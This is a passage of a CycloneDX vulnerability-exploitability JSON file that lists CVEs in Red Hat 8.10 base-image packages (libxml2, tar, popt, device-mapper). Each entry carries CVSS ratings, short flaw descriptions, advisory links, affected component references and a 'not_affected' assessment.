        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-18477",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        367
      ],
      "description": "A TOCTOU (Time-of-Check Time-of-Use) vulnerability in GNU tar's incremental dumpdir 'X' rename handling allows a local attacker with write access to a directory being backed up to influence the restore process if the attacker has access to the system where the restore is being performed. During restoration, files or directories may be created, renamed or overwritten outside the intended extraction directory. This could lead to unauthorized file modification or, in some cases, privilege escalation. Exploitation does not require the attacker to modify or craft the archive, and standard backup and restore workflows\u2014including extracting into a newly created directory without using the -P option do not mitigate the issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-18477"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49361"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-18477"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2509735"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18477"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-18477"
        }
      ],
      "published": "2026-08-03T17:16:33+00:00",
      "updated": "2026-08-13T16:09:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-18508",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        59
      ],
      "description": "A flaw was found in GNU tar. When extracting an archive with the --one-top-level option, hardlink targets are not confined to the designated top-level directory and may resolve relative to the extraction working directory. A crafted archive can create hardlinks that escape the intended boundary and, when combined with a preexisting symbolic link under the working directory, may allow writing outside that boundary during a single extraction.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-18508"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50807"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-18508"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2509843"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18508"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-18508"
        }
      ],
      "published": "2026-08-03T16:16:28+00:00",
      "updated": "2026-08-18T16:36:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-18739",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in popt, a command-line option parsing library. An off-by-one error in the poptStuffArgs function, when repeatedly called by a host application or through deep alias nesting, can lead to corruption of internal program data. This corruption could potentially enable a local attacker to execute arbitrary code if the host application then unsafely processes the altered data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-18739"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56984"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-18739"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2510737"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18739"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-18739"
        }
      ],
      "published": "2026-08-04T06:16:30+00:00",
      "updated": "2026-08-19T14:17:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18-1.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-18839",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        191
      ],
      "description": "An integer underflow was found in the popt library when formatting help text for option tables that exceed the terminal width. A local user who can cause an application to print help under those conditions may cause that application to crash or fail to display help, resulting in a denial of service of the affected application.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-18839"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-18839"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2511010"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18839"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-18839"
        }
      ],
      "published": "2026-08-05T21:16:57+00:00",
      "updated": "2026-08-06T15:37:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18-1.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-19617",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        770
      ],
      "description": "A flaw was found in libdm. A local attacker could craft a malicious Logical Volume Manager (LVM) metadata configuration with deeply nested structures. This could lead to uncontrolled recursion in the libdm configuration file parser, exhausting the stack and causing any LVM command reading the metadata to crash. This vulnerability results in a Denial of Service (DoS) for affected systems.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-19617"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-19617"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2514626"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-19617"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-19617"
        }
      ],
      "published": "2026-08-14T06:17:14+00:00",
      "updated": "2026-08-14T19:07:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8",
          "versions": [
            {
              "version": "8:1.02.181-15.el8_10.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8",
          "versions": [
            {
              "version": "8:1.02.181-15.el8_10.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
